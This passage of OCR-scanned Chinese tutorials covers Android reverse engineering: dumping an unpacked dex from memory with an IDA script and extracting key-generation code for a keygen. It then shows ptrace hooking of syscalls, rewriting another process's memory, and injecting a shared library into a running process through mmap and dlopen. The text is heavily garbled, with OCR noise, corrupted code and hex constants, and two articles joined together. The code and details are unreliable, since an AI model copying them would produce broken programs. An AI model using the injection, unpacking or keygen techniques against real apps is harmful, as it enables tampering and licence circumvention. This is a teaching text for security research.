.Zi7dvmRawDexFileOp: z 
_Z22dvmRawDexFileOpi Y Quick filter 
-Z20dvmOpenCachedD| Ni! Modify filters... 
_ZN12gossip_loccs6Filte 
_Z17dexZipOpenArchive ht 


ff Enable breakpoint 
B Disable breakpoint 
3X Delete breakpoint 





OU UO E DE DE) 














然后 在 libdvm.so 中 的 dvmDexFileOpenPartial 函 数 上 下 一 个 断 点 : 
R8 5C137808 4 debug158:5C137 608 
R1 8889^1FC Y 





然后 我 们 点 击 继续 运行 ， 程 序 就 会 在 dvymDexFileOpenPartial() 这 个 函数 处 暂停 ，R0 寄 存 器 指 


向 的 地 址 就 是 dex 文 件 在 内 存 中 的 地 址 ，R1 寄 存 器 就 是 dex 文 件 的 大 小 : 
R8 5C137668 w debugi58:5C137088 
R1 888941FC ù 





65 

50137618 EB 32 ^1 72 B7 D9 CE AS 6D 51 E6 41 86 56 BC 9D 
50137628 FC 41 69 88 70 66 66 66 78 56 34 12 66 66 66 88 
50137638 66 66 66 66 20 41 69 66 FA 18 66 66 76 OA 66 868 
501376048 62 64 OG 66 30 64 66 66 2A 05 66 66 38 74 66 808 
50137858 96 86 66 66 30 B2 66 66 68 19 66 66 EB E6 66 88 
501376868 86 82 88 66 20 AF 61 66 1C 42 G7 66 EB FF 81 88 





-2nr----mQ-h-U. - 
= 
Ss 
em ip cmm 


然后 我 们 就 可 以 使 用 ida 的 script command X: dump A # F $$9dexsc fF 1 » 
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P IDA - C:\Users\Sparkmin\AppData\Local\Ter 
Edit Jump Search View Debugge 


New instance 


Imi] Open... 


Load file 


Produce file 
七 Script file... 


Ed Save 


Save as... 





(Take database snapshot... 


Execute script me 


Snippet list Please enter script body 





Name static main(void) 
Default snippet * 

M Defaut snippe auto fp, begin, end, dexbyte; 

fp = fopen("C:\\dump.dex", “wb''); 

begin = r8; 

end = r8 + r1; 

for ( dexbyte = begin; dexbyte < end; dexbyte 

++ ) 

fputc(Byte(dexbyte), fp); 

} 














| 


Line 1 of 1 


Scripting language | IDC ¥ |Tab size 4 














Line:10 Column: 1 





| | Export | | Import 








static main(void) 
{ 
auto fp, begin, end, dexbyte; 
fp = fopen("C:\\dump.dex", "wb"); 
begin = r0; 
end = rO + r1; 
for ( dexbyte = begin; dexbyte < end; dexbyte ++ ) 
fputc(Byte(dexbyte), fp); 


Dump 完 dex 文 件 后 ， 我 们 就 可 以 用 baksmali 来 反 编译 这 个 dex 文 件 了 。 


c:N?weapons> java —jar baksmali-2.8.3.jar dump.dex 





AACA RES > RR T — dump dex 文 件 的 视频 在 我 的 github， 有 兴趣 的 同学 可 以 去 
下 载 观看 。 


当然 这 只 是 最 简单 脱 这 方法 ， 很 多 高 级 这 会 动态 修改 dex 的 结构 体 ， 比 如 将 codeoffset 指 向 内 
存 中 的 其 他 地 址 ， 这 样 的 话 你 dump 出 来 的 dex 文 件 其 实 是 不 完整 的 ， 因 为 代码 段 保 存在 了 内 
存 中 的 其 他 位 置 。 但 你 不 用 担心 ， 我 们 会 在 随后 的 文章 中 介绍 一 种 非常 简单 的 解决 方案 ， 襄 
请 期 待 。 


0x09 Function Rewrite 函数 重 写 


有 时 我 们 想 要 将 app 中 的 茶 个 函数 的 逻 辑 提取 出 来 ， 用 gcc 重 新 编译 一 个 可 执行 文件 ， 比 如 我 
们 想 要 写 一 个 注册 机 ， 就 需要 把 9pp 生 成 key 的 逻辑 提取 出 来 。 但 是 ida ”"F5” 过 后 的 Cc 语言 直接 
编译 经 常会 有 很 多 错误 ， 比 如 未 定义 的 宏 ， 未 定义 的 声明 等 。 这 是 因为 这 些 宏 都 在 jda 的 一 个 
头 文件 里 。 里 面 定义 了 所 有 ida 自 定义 的 宏和 声明 ， 比 如 说 经 常见 到 的 BYTEn() 宏 : 

#define BYTEn(x, n) (* ((_BYTE* )&(x)+n) ) 


#define BYTE1(x) BYTEn(x, 1) // byte 1 (counting from 0) 
#define BYTE2(x) BYTEn(x, 2) 


加 上 这 个 ”defs.h” 头 文件 后 就 可 以 正常 的 编译 ida "F5" 后 的 C 语 言 了 。 


另外 我 们 还 可 以 自己 创建 一 个 NDK 项 目 ， 然 后 自己 编写 一 个 so 或 者 elf 利 用 dlopen() 和 dlsym() 
HA A ds so P hy C o 649 41128 3-7 A libdvm.so Y $9 dvmGetCurrentJNIMethod() £i Z& > R 
们 就 可 以 在 我 们 的 NDK 项 目 中 这 么 写 : 


typedef void* (*dvmGetCurrentJNIMethod func)(); 

dvmGetCurrentJNIMethod_func dvmGetCurrentJNIMethod_fnPtr; 

dvm hand- dlopen("libdvm.so", RTLD NOW); 

dvmGetCurrentJNIMethod fnPtr -dlsym(dvm hand, " Z22dvmGetCurrentJNIMethodv"); 
dvmGetCurrentJNIMethod fnPtr(); 


0x10  Z 
还 是 那 铝 话 ， 写 了 这 么 多 依然 不 能 保证 本 文 能 够 履 盖 到 jida 调 试 的 方方面面 ， 因 为 jda 实 在 是 太 


博大 精深 了 。 看 官 如 有 兴趣 可 以 继续 深入 研究 学 习 。 另 外 文章 中 所 有 提 到 的 代码 和 工具 都 可 
以 在 我 的 github 下 载 到 ， 地 址 是 : 


https://github.com/zhengmin1989/TheSevenWeapons 


0x11 参考 文章 


MSC IRE http://bbs.pediy.com/showthread.php?t-197235 


原文 by RA 


0x00 序 


随 着 移动 安全 越 来 越 火 ， 各 种 调试 工具 也 都 层出不穷 ， 但 因为 环境 和 需求 的 不 同 ， 并 没有 工 
具 是 万 能 的 。 另 外 工具 是 死 的 ， 人 是 活 的， 如 果 能 搞 懂 工具 的 原理 再 结合 上 自身 的 经 验 ， 你 
也 可 以 创造 出 属于 自己 的 调试 武器 。 因 此 ， 笔 者 将 会 在 这 一 系列 文章 中 分 享 一 些 自己 经 常用 
或 原创 的 调试 工具 以 及 手段 ， 布 望 能 对 国内 移动 安全 的 研究 起 到 一 些 催化 剂 的 作用 。 


文章 中 所 有 提 到 的 代码 和 工具 都 可 以 在 我 的 github 下 载 到 ， 地 址 是 : 


https://github.com/zhengmin1989/TheSevenWeapons 


0x01 à 745 
Hooking 翻 译 成 中 文 就 是 钩子 的 意思 ， 所 以 正好 配合 这 一 章 的 名 字 《 离 别 钩 》。 


“我 知道 钩 是 种 武器 ， 在 十 八 般 兵器 中 名 列 第 七 ， 离 别 钧 呢 ?7 
“离别 钓 也 是 种 武器 ， 也 是 钧 。” 

“既然 是 钧 ， 为 什么 要 叫做 离别 3” 

“因为 这 柄 钧 ， 无 论 钧 住 什么 都 会 造成 离别 。 如 果 它 钧 住 你 的 手 ， 你 的 手 就 要 和 腕 离别 ; 如 果 它 钓 住 你 的 脚 ， 你 的 脚 就 
要 和 腿 离 别 。” 

“如 果 它 钧 住 我 的 咽喉 ， 我 就 和 这 个 世界 离别 了 ?7 

“你 为 什么 要 用 如 此 残酷 的 武器 ?7 

“因为 我 不 愿 被 人 强迫 与 我 所 爱 的 人 离别 。” 

“我 明白 你 的 意思 了 。” 

“AR AY 明 白 ?7 

“你 用 离别 钩 ， 只 不 过 为 了 要 相聚 。7 

"X d] o t 


一 提 到 hooking， 让 我 又 回想 起 了 2011 年 的 时 候 。 当 时 android 才 出 来 没 多 久 ， 各 大 安全 公司 
都 在 忙 着 研发 自己 的 手机 助手 。 当 时 手机 上 最 泛滥 的 病毒 就 是 短信 扣 费 类 的 病毒 ， 但 仅仅 是 
靠 云 端的 病毒 库 扫 描 是 远 远 不 够 的 。 而 这 时 候 ”"LBE 安 全 大 师 ” 横 空 出 世 ， 提 供 了 主动 防御 的 技 
术 ， 可 以 在 病毒 发 送 短 信之 前 拦截 下 来 ， 并 让 用 户 选择 是 否 发 送 。 其 实 这 个 主动 防御 技术 就 
是 hooking。 虽 然 在 PC 上 hooking 的 技术 已 经 很 成 熟 了 ， 但 是 在 android 上 的 资料 却 非 常 稀少 ， 
只 有 少数 人 掌握 着 android 上 hooking 的 技术 ， 因 此 这 些 人 也 变 成 了 各 大 公司 争 相 抢夺 的 对 象 。 
但 是 没有 什么 东西 是 能 够 永久 保密 的 ， 这 些 技术 早晚 会 被 大 家 研究 出 来 并 对 外 公开 的 。 

此 ， 到 了 2015 年 ，android 上 的 hook 资 料 已 经 遍地 都 是 了 ， 各 种 开源 的 hook 框 架 也 层出不穷 ， 
使 用 这 些 hook 工 具 就 可 以 轻松 的 hook native，jni 和 java 层 的 函数 。 但 这 同样 也 带 来 了 一 些 问 
题 ， 新 手 想 研究 hook 的 时 候 因为 资料 和 工具 太 多 往往 不 知道 如 何 下 手 ， 并 且 就 算 使 用 了 工具 
成 功 的 hook， 也 根本 不 知道 原理 是 什么 。 因 此 笔者 准备 从 hook 的 原理 开始 ， 配 合 开源 工具 循 
序 渐 进 的 介绍 native，jni 和 java 层 的 hook， 方 便 大 家 对 hook 进 行 系统 的 学 习 。 


0x02 Playing with Ptrace on Android 


其 实 无 论 是 hook 还 是 调试 都 宛 不 开 ptrace 这 个 system call， 利 用 ptrace， 我 们 可 以 跟踪 目标 进 
程 ， 并 且 在 目标 进 ere eee E 进行 读 写 。 在 linux 上 有 一 篇 经 典 的 文章 叫 
(Playing with Ptrace) ， 简 单 介绍 T a pirane 在 这 里 我 们 照 猫 画 虎 dud T 
playing with Ptrace on Android ° PS : 这 里 的 一 部 分 内 容 借 鉴 了 harry 大 牛 在 百 写 的 一 篇 
文章 ， 可 惜 后 来 百度 Hi 关 了 ， 就 失传 了 。 不 过 不 用 担心 ， 我 这 篇 比 他 写 的 还 ene >) 


首先 来 看 我 们 要 ptrace 的 目标 程序 ， 用 来 一 直 循 环 输出 一 句 话 ”Hello,LiBieGou!” : 


#include <stdio.h> 
int count = 0; 


void sevenWeapons(int number ) 


{ 
char* str = "Hello, LiBieGou!"; 
printf("%s %d\n",str,number) ; 
} 
int main() 
while(1) 
{ 
sevenWeapons(count); 
count++; 
sleep(1); 
return 0; 
} 


想 要 编译 它 非 常 简单 ， 首 先 建立 一 个 Android.mk 文 件 ， 然 后 填 入 如 下 内 容 ， 让 ndk 将 文件 编译 
为 elf 可 执行 文件 : 


LOCAL_PATH := $(call my-dir) 
include $(CLEAR_VARS) 
LOCAL_MODULE := target 
LOCAL_SRC_FILES := target.c 


include $(BUILD EXECUTABLE) 


接 下 来 我 们 写 出 hook1.c 程 序 来 hook target 程 序 的 system call > main Zt de TF : 


int main(int argc, char *argv[]) 
{ 
if(arge != 2) { 
printf("Usage: %s «pid to be traced>\n", argv[0]); 
return 1; 


} 


pid_t pid; 

int status; 

pid = atoi(argv[1]); 

if(0 != ptrace(PTRACE ATTACH, pid, NULL, NULL)) 


printf("Trace process failed:%d.\n", errno); 
return 


} 


ptrace(PTRACE_SYSCALL, pid, NULL, NULL); 
while(1) 
{ 


wait(&status); 
hookSysCallBefore(pid); 
ptrace(PTRACE SYSCALL, pid, NULL, NULL); 


wait(&status); 
hookSysCallAfter(pid); 
ptrace(PTRACE SYSCALL, pid, NULL, NULL); 


} 


ptrace(PTRACE_DETACH, pid, NULL, NULL); 
return 0; 


首先 要 知道 hook 的 目标 的 pid， 这 个 用 ps 命令 就 能 获取 到 。 然 后 我 们 使 用 
ptrace(PTRACE_ATTACH, pid, NULL, NULL) 这 个 函数 对 目标 进程 进行 加 载 。 加 载 成 功 后 我 
们 可 以 使 用 ptrace(PTRACE_SYSCALL, pid, NULL, NULL) 这 个 函数 来 对 目标 程序 下 断 点 ， 每 
当 目 标 程序 调用 system call 前 的 时 候 ， 就 会 暂停 下 载 。 然 后 我 们 就 可 以 读 取 寄 存 器 的 值 来 获 
取 system call 的 各 项 信息 。 然 后 我 们 再 一 次 使 用 ptrace(PTRACE _SYSCALL, pid, NULL, 
NULL) 这 个 函数 就 可 以 让 system call 在 调用 完 后 再 一 次 暂停 下 来 ， 并 获取 system call 的 返回 
值 。 


获取 System call 编 号 的 函数 如 下 : 


long getSysCallNo(int pid, struct pt regs *regs) 
{ 
long scno = 0; 
scno = ptrace(PTRACE_PEEKTEXT, pid, (void *)(regs->ARM_pc - 4), NULL); 
if(scno == 0) 
return 0; 


if (scno == Oxef000000) { 
scno = regs-»ARM r7; 
} else { 
if ((scno & oxoffoooo0) !- oxof900000) { 
return -1; 


scno &- OxOOOfffff; 


return scno; 


ARM 架 构 上 ， 所 有 的 系统 调用 都 是 通过 SWI 来 实现 的 。 并 且 在 ARM 架构 中 有 两 个 SWI 指 令 ， 
分 别针 对 EABIl 和 OABI : 


[EABI] 
机 器 码 : 1110 1111 0000 0000 -- SWI 0 


具体 的 调用 号 存放 在 寄存 器 r7 中 . 


[OABI] 

机 器 码 : 1101 1111 vvvv vvvv -- SWI immed 8 

调用 号 进行 转换 以 后 得 到 指令 中 的 立即 数 。 立 即 数 = 调用 号 | Ox900000 

既然 需要 兼容 两 种 方式 的 调用 ， 我 们 在 代码 上 就 要 分 开 处 理 。 首 先 要 获取 SWI 指 令 判断 是 
EABI 还 是 OABI， 如 果 是 EABI， 可 从 r7 中 获取 调用 号 。 如 果 是 OABI， 则 从 SWI 指 令 中 获取 立 
即 数 ， 反 向 计算 出 调用 号 。 


我 们 接着 看 hook system call 前 的 函数 ， 和 hook system call 后 的 函数 : 


void hookSysCallBefore(pid_t pid) 


{ 

struct pt regs regs; 

int sysCallNo = 0; 

ptrace(PTRACE_GETREGS, pid, NULL, &regs); 

sysCallNo = getSysCallNo(pid, &regs); 

printf ("Before SysCallNo = %d\n",sysCallNo); 

if(sysCallNo == _ NR write) 

printf(" NR write: %ld %p %ld\n",regs.ARM_rO, (void*)regs.ARM_ri, regs.ARM_r2); 

} 


void hookSysCallAfter(pid_t pid) 


{ 
struct pt_regs regs; 
int sysCallNo = 0; 
ptrace(PTRACE_GETREGS, pid, NULL, &regs); 
sysCallNo = getSysCallNo(pid, &regs); 
printf("After SysCallNo = %d\n",sysCall1No); 
if(sysCallNo == __NR_write) 
printf(" NR write return: %ld\n",regs.ARM_rO); 
picem (Nn) 
} 


在 获取 了 system call 的 number 以 后 ， 我 们 可 以 进一步 获取 个 个 参数 的 值 ， 比 如 说 Write 这 个 
system call。 在 arm 上 ， 如 果 形 参 个 数 少 于 或 等 于 4， 则 形 参 由 RO,R1,R2,R3 四 个 寄存 器 进行 
传递 。 若 形 参 个 数 大 于 4， 大 于 4 的 部 分 必须 通过 堆栈 进行 传递 。 而 执行 完 函 数 后 ， 遂 数 的 返 
回 值 会 保存 在 R0 这 个 寄存器 里 。 


下 面 我 们 就 来 实际 运行 一 下 看 看 效果 。 我 们 先 把 target 和 hook1 push 到 /data/local/tmp B % 
下 ， 再 chmod 777 一 下 。 接 着 运行 target。 


Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 


OR PO 


我 们 随后 再 开 一 个 shell， 然 后 ps 获取 target 的 pid， 然 后 使 用 hook1 程 序 对 target 进 行 hook 操 
dE : 


# ./hooki 23442 
Before SysCallNo = 162 
After SysCallNo = 162 


Before SysCallNo = 4 

. NR write: 1 Oxadf020 19 
After SysCallNo - 4 

. NR write return: 19 


Before SysCallNo - 162 
After SysCallNo - 162 


Before SysCallNo - 4 

. NR write: 1 Oxadf020 19 
After SysCallNo - 4 

. NR write return: 19 


RATT A BI] — 4 SysCallNoX 162° 453b X sleep HA » 3$ — ^ SysCallNoX4 > WRA 
write 函数 ， 因 为 printf 本 质 就 是 调用 write 这 个 系统 调用 来 完成 的 。 关 于 system call number 
应 的 具体 System call 可 以 参考 我 在 github 上 的 reference 文 件 夹 中 的 systemcalllist.txt 文 件 ， 里 
面 有 对 应 的 列表 。 我 们 的 hook1 程 序 还 对 write 的 参数 做 了 解析 ， 上 比如 1 表示 stdout > Oxadf020 
表示 字符 串 的 地 址 ，19 代 表 字 符 串 的 长 度 。 而 返回 值 19 表 示 write 成 功 写 入 的 长 度 ， 也 就 是 字 
符 串 的 长 度 。 


整个 过 程 用 图 表达 如 下 : 
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0x03 利用 Ptrace 动 态 修改 内 存 


仅仅 是 用 ptrace 来 获取 System call 的 参数 和 返回 值 还 不 能 体现 出 ptrace 的 强大 ， 下 面 我 们 就 来 
演示 用 ptrace 读 写 内 存 。 我 们 在 hook1.c 的 基础 上 继续 进行 修改 ， 在 Write 被 调用 之 前 对 要 输出 
string 进 行 翻 转 操 作 。 


R11 4 hookSysCallBefore() 4 žk Y a2 AmodifyString(pid, regs.ARM r1, regs.ARM _r2) 这 个 函 
d: 


if(sysCallNo == — NR write) 
printf(" NR write: %ld %p ?$1dNn",regs.ARM rO,(void*)regs.ARM ri,regs.ARM r2); 


modifyString(pid, regs.ARM ri, regs.ARM r2); 
} 


因为 write 的 第 二 个 参数 是 字符 串 的 地 址 ， 第 三 个 参数 是 字符 串 的 长 度 ， 所 以 我 们 把 R1 和 R2 的 
hae Z& modifyString()3X A a : 


void modifyString(pid_t pid, long addr, long strlen) 


{ 
eham str, 
str = (char *)calloc((strlen*1) * sizeof(char), 1); 
getdata(pid, addr, str, strien); 
reverse(str); 
putdata(pid, addr, str, strien); 
H 


modifyString() 首 先 获 取 在 内 存 中 的 字符 串 ， 然 后 进行 翻转 操作 ， 最 后 再 把 翻转 后 的 弛 
入 原来 的 地 址 。 这 些 操作 用 到 了 getdata() 和 putdata() 函 数 : 
void getdata(pid_t child, long addr, 


char *str, int len) 
{ char *laddr; 


ants 
union u { 
long val; 
char chars[long size]; 
}data; 
i= 0; 
j = len / long_size; 
laddr = str; 


while(i < j) { 
data.val = ptrace(PTRACE_PEEKDATA, 
child, addr + i * 4, 


NULL); 
memcpy(laddr, data.chars, long_size); 
++i; 
laddr += long_size; 

} 
j = len % long_size; 
if(j != 0) { 


data.val = ptrace(PTRACE_PEEKDATA, 
child, addr + i * 4, 
NULL); 

memcpy(laddr, data.chars, j); 


} 
str[len] = '\0'; 
} 
void putdata(pid_t child, long addr, 


char ”str ane Len) 
{ char *laddr; 


anc aby Jl 
union u { 
long val; 
char chars[long_size]; 
}data; 
i = 0; 
j = len / long_size; 
laddr = str; 


while(i < j) { 
memcpy(data.chars, laddr, long_size); 
ptrace(PTRACE_POKEDATA, child, 
addr + i * 4, data.val); 


tti; 
laddr += long size; 
} 
j = len % long_size; 
if(j != 0) { 
memcpy(data.chars, laddr, j); 
ptrace(PTRACE_POKEDATA, child, 
addr + i * 4, data.val); 
j 


getdata() 和 putdata() 分 别 使 用 PTRACE_PEEKDATA 和 PTRACE_POKEDATA 对 内 存 进行 读 


操作 。 因 为 ptrace 的 内 存 操作 一 次 只 能 控制 4 个 字 节 ， 所 以 如 果 修 改 比 较 长 的 内 容 


次 操作 。 
我 们 现在 运行 一 下 target， 并 且 在 运行 中 用 hook2 程 序 进行 hook : 


./target 


Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
8 !uoGeiBiL, olleH 
9 !uoGeiBiL, olleH 
01 !uoGeiBiL,olleH 
11 !uoGeiBiL, olleH 
21 !uoGeiBiL,olleH 
31 !uoGeiBiL,olleH 
Hello,LiBieGou! 14 
Hello,LiBieGou! 15 
Hello,LiBieGou! 16 


NOOBRWNEF © 


需要 进行 


哈哈 ， 是 不 是 看 到 字符 串 都 被 翻转 了 。 如 果 我 们 退出 hook2 程 序 ， 字 符 串 又 会 回 到 原来 的 样 


子 。 


0x04 利用 Ptrace 动 态 执行 sleep() 函 效 


一 节 中 我 们 介绍 了 如 何 使 用 ptrace 来 修改 内 存 ， 现 在 继续 介绍 如 何 用 ptrace 来 执行 libc .so 中 


的 sleep() 函 数 。 主 要 逮 辑 都 在 inject() 这 个 函数 中 : 


void inject(pid_t pid) 
t 
struct pt regs old regs,regs; 
long sleep addr; 
//save old regs 
ptrace(PTRACE GETREGS, pid, NULL, &old regs); 
memcpy(&regs, &old regs, sizeof(regs)); 


printf("getting remote sleep addr:*n"); 
sleep addr - get remote addr(pid, libc path, (void *)sleep); 


long parameters[1]; 
parameters[0] = 10; 


ptrace call(pid, sleep addr, parameters, i, &regs); 





//restore old "ec JE 


人 SETREGS, pid, NULL, &old regs); 


首先 我 们 用 ptrace(PTRACE_GETREGS, pid, NULL, &old regs) 来 保存 一 下 寄存 器 的 值 ， 然 
后 获取 sleep() 有 函数 在 目标 进程 中 的 地 址 ， 接 着 利用 ptrace 执 行 sleep() 有 函数 ， 最 后 在 执行 完 
sleep() US £f] ptrace(PTRACE_SETREGS, pid, NULL, &old_regs) 恢 复 寄存 器 原来 值 。 


下 面 是 获取 sleep() 有 函数 在 目标 进程 中 地 址 的 代码 : 


void* get_module_base(pid_t pid, const char* module_name) 


{ 
FILE *fp; 
long addr = 0; 
char *pch; 
char filename[32]; 
char line[1024]; 
if (pid == 0) { 
snprintf (filename, sizeof(filename), "/proc/self/maps"); 
} else { 
snprintf (filename, sizeof(filename), "/proc/%d/maps", pid); 
fp = fopen(filename, "r"); 
if (fp != NULL) { 
while (fgets(line, sizeof(line), fp)) { 
if (strstr(line, module_name)) { 
pch = strtok( line, "-" ); 
addr = strtoul( pch, NULL, 16 ); 
if (addr == 0x8000) 
addr = 0; 
break; 
j 
} 
fclose(fp) ; 
} 
return (void *)addr; 
} 


long get remote addr(pid t target pid, const char* module name, void* local addr) 
void* local handle, *remote handle; 


local handle - get module base(0, module name); 
remote handle - get module base(target pid, module name); 


printf("module base: local[%p], remote[%p]\n", local handle, remote handle); 


long ret addr = (long)((uint32 t)local addr + (uint32 t)remote handle - (uint32 t) 
local handle); 


printf("remote addr: [%p]\n", (void*) ret addr); 


return ret addr; 


为 libc.so 在 内 存 中 的 地 址 是 随机 的 ， 所 以 我 们 需要 先 获取 目标 进程 的 libc.so 的 加 载 地 址 ， 再 
获取 自己 进程 的 libc.so 的 加 载 地 址 和 sleep() 在 内 存 中 的 地 址 。 然 后 我 们 就 能 计算 出 sleep() 艺 
数 在 目标 进程 中 的 地 址 了 。 要 注意 的 是 获取 目标 进程 和 自己 进程 的 libc.so 的 加 载 地 址 是 通过 解 
析 /proc/[pid]/maps 得 到 的 。 


接 下 来 是 执行 sleep() 函 数 的 代码 : 


int ptrace_call(pid_t pid, long addr, long *params, uint32_t num_params, struct pt_reg 
s* regs) 
E | 
uint32_t 1; 
for (i = 0; i < num params && i < 4; i ++) { 
regs->uregs[i] = params[i]; 


} 

// 

// push remained params onto stack 
7 

if (i « num params) { 


regs-»-ARM sp -= (num params - i) * sizeof(long) ; 
putdata(pid, (long)regs-»ARM sp, (char*)&params[i], (num params - i) * sizeof( 
1ong)); 
} 


regs->ARM_pc = addr; 

if (regs->ARM_pc & 1) { 
/* thumb */ 
regs->ARM_pc &= (-1u); 
regs->ARM_cpsr |= CPSR_T_MASK; 


Jp CULE) af 
"Exam 
regs->ARM_cpsr &- -CPSR T MASK; 
} 
regs->ARM_lr = 0; 
if (ptrace setregs(pid, regs) == -1 
|| ptrace continue(pid) == -1) { 


printf("error\n"); 
return -1; 


} 


int stat = 0; 
waitpid(pid, &stat, WUNTRACED); 
while (stat != Oxb7f) { 
if (ptrace_continue(pid) == -1) { 
printf("error\n"); 
return -1; 


} 
waitpid(pid, &stat, WUNTRACED); 


return 0; 


首先 是 将 参数 赋值 给 R0-R3， 如 果 参 数 大 于 四 个 的 话 ， 再 使 用 putdata() 将 参数 存放 在 栈 上 。 然 
后 我 们 将 PC 的 值 设 置 为 函数 地 址 。 接 着 再 根据 是 否 是 thumb 指 令 设 置 ARM_cpsr 寄 存 器 的 值 。 
随后 我 们 使 用 ptrace_setregs() 将 目标 进程 寄存 器 的 值 进行 修改 。 最 后 使 用 waitpid() 等 待 函 数 
被 执行 。 


编译 完 后 ， 我 们 使 用 hook3 对 target 程 序 进行 hook : 


# ./target 


Hello, LiBieGou! 0 
Hello, LiBieGou! 1 
Hello, LiBieGou! 2 
Hello, LiBieGou! 3 
[.sleep 10 seconds..] 
Hello,LiBieGou! 4 
Hello,LiBieGou! 5 


./hook3 2483 
getting remote ee 


module base: iocal[0xb6f35000], remote[0xb6eec000] 
remote addr: [Oxb6f1a24b] 


间 ， 因 为 我 们 利用 ptrace 运 行 了 sleep(10) 在 目标 程序 中 。 


0x05 利用 Ptrace 动 态 加 载 sSo 并 执行 自 定 


函数 


仅仅 是 执行 现 有 的 libc 函 数 是 不 能 满足 我 们 的 需求 的 ， 接 下 来 我 们 继续 介绍 如 何 动态 


定义 SO 文件 并 且 运 行 So 文件 中 的 函数 。 人 逻辑 大 概 如 下 : 


正常 的 情况 是 target 程 序 每 秒 输出 一 句 话 ， 但 是 用 hook3 程 序 hook 后 ， 就 会 暂停 10 秒 钟 的 时 


的 加 载 自 


保存 当前 寄存 器 的 状态 -> 获取 目标 程序 的 mmap, dlopen, disym, dlclose 地 址 -> 调用 mmap 
分 配 一 段 内 存 空间 用 来 保存 参数 信息 —> 调用 dlopen 加 载 so 文 件 -> 调用 dlsym 找 到 目标 函数 地 
的 状态 


Ak -> 使 用 ptrace_call 执 行 目标 函数 -> 调用 dlclose #pRsoxt -> 恢复 寄存 器 


实现 整个 逻辑 的 函数 injectSo() 的 代码 如 下 : 


void injectSo(pid_t pid,char* so path, char* function name,char* parameter) 


{ 
struct pt_regs old_regs,regs; 
long mmap_addr, dlopen_addr, dlsym_addr, dlclose_addr; 


//save old regs 


ptrace(PTRACE_GETREGS, pid, NULL, &old_regs); 
memcpy (&regs, &old regs, sizeof(regs)); 


// get remote addres 


printi (getting remote addres:\n"); 

mmap_addr = get_remote_addr (pid, libc_path, (void *)mmap); 
dlopen_addr = get_remote_addr( pid, libc_path, (void *)dlopen ); 
dlsym addr = get_remote_addr( pid, libc path, (void *)dlsym ); 
dlclose addr - get remote addr( pid, libc path, (void *)dlclose ); 


printf("mmap addr-?*p dlopen_addr=%p dlsym_addr=%p dlclose_addr=%p\n", 


(void*)mmap addr,(void*)dlopen addr,(void*)dlsym addr,(void*)dlclose addr); 


long parameters[10]; 
/ /mmap 


parameters[6] 
parameters[1] 
parameters[2] 
parameters[3] 
parameters[4] 
parameters[5] 


0; //address 

0x4000; //size 

PROT READ | PROT WRITE | PROT EXEC; //WRX 
MAP ANONYMOUS | MAP PRIVATE; //fiag 

0. //fd 

0; //offset 


ptrace_call(pid, mmap_addr, parameters, 6, &regs); 


ptrace(PTRACE_GETREGS, pid, NULL, &regs); 
long map base = regs.ARM r0; 


printf("map base = %p\n", (void*)map base); 
/ / dlopen 


printf("save so path = %s to map base = %p\n", so path, (void*)map base); 
putdata(pid, map base, so path, strien(so path) + 1); 


parameters[6] 
parameters[1] 


- map base; 
= RTLD NOW| RTLD GLOBAL; 


ptrace call(pid, dlopen addr, parameters, 2, &regs); 


ptrace(PTRACE GETREGS, pid, NULL, &regs); 
long handle - regs.ARM r0; 


printf("handle = %p\n",(void*) handle); 
//dlsym 

printf("save function name = %s to map base = %p\n", function name, (void*)map bas 
e); 


putdata(pid, map base, function name, strien(function name) + 1); 


parameters[6] 
parameters[1] 


- handle; 
- map base; 


ptrace call(pid, dlsym addr, parameters, 2, &regs); 


ptrace(PTRACE GETREGS, pid, NULL, &regs); 
long function ptr - regs.ARM r0; 


printf("function ptr = %p\n", (void*)function ptr); 
//function call 


printf("save parameter = %s to map base = %p\n", parameter, (void*)map base); 
putdata(pid, map base, parameter, strien(parameter) -* 1); 


parameters[0] = map base; 

ptrace call(pid, function ptr, parameters, i, &regs); 
//dlcose 

parameters[0] = handle; 

ptrace_call(pid, dlclose_addr, parameters, i, &regs); 
//restore old regs 


ptrace(PTRACE_SETREGS, pid, NULL, &old_regs); 


mmap() 可 以 用 来 将 一 个 文件 或 者 其 它 对 象 映 射 进 内 存 ， 如 果 我 们 把 flag 设 置 为 
MAP_ANONYMOUS 并 且 把 参数 fd 设置 为 0 的 话 就 相当 于 直接 映射 一 段 内 容 为 空 的 内 存 。 
mmap() 的 函数 声明 和 参数 如 下 : 

void* mmap(void* start,size_t length,int prot,int flags,int fd,off_t offset); 
start : 映射 区 的 开始 地 址 ， 设 置 为 0 时 表示 由 系统 决定 映射 区 的 起 始 地址 。 
length : 映射 区 的 长 度 。 


prot : 期 望 的 内 存 保 护 标志 ， 不 能 与 文件 的 打开 模式 冲突 。 我 们 这 里 设置 为 RWX © 

flags : 指定 映射 对 象 的 类 型 ， 映 射 选项 和 映射 页 是 否 可 以 共享 。 我 们 这 里 设置 为 : 
MAP_ANONYMOUS( 匿 名 映射 ， 映 射 区 不 与 任何 文件 关联 )，MAP_PRIVATE( 建 立 一 个 写 入 
时 拷贝 的 私有 了 映射。 内 存 区 域 的 写 入 不 会 影响 到 原文 件 )。 

fd : 有 效 的 文件 描述 词 。 匿 名 映射 设置 为 0。 

off toffset : 被 映射 对 象 内 容 的 起 点 。 设 置 为 0。 

在 我 们 使 用 ptrace_call(pid, mmap_addr, parameters, 6, &regs) 调 用 完 mmap() 函 数 之 后 ， 要 
记得 使 用 ptrace(PTRACE_GETREGS, pid, NULL, &regs); 用 来 获取 保存 返回 值 的 
regs.ARM_r0， 这 个 返回 值 也 就 是 映射 的 内 存 的 起 始 地 址 。 


mmap() 映 射 的 内 存 主要 用 来 保存 我 们 传 给 其 他 函数 的 参数 。 比 如 接 下 来 我 们 需要 用 dlopen() 
去 加 载 "/data/local/tmp/libinject.so” 这 个 文件 ， 所 以 我 们 需要 先 用 putdatal() 

将 "/data/local/tmp/libinject.so” 这 个 字符 串 放置 在 mmap() 所 映射 的 内 存 中 ， 然 后 就 可 以 将 这 个 
映射 的 地 址 作为 参数 传递 给 dlopen() 了 。 接 下 来 的 dlsym()，so 中 的 目标 函数 ，dlclose() 都 是 相 
同调 用 的 方式 ， 这 里 就 不 一 一 元 述 了 。 


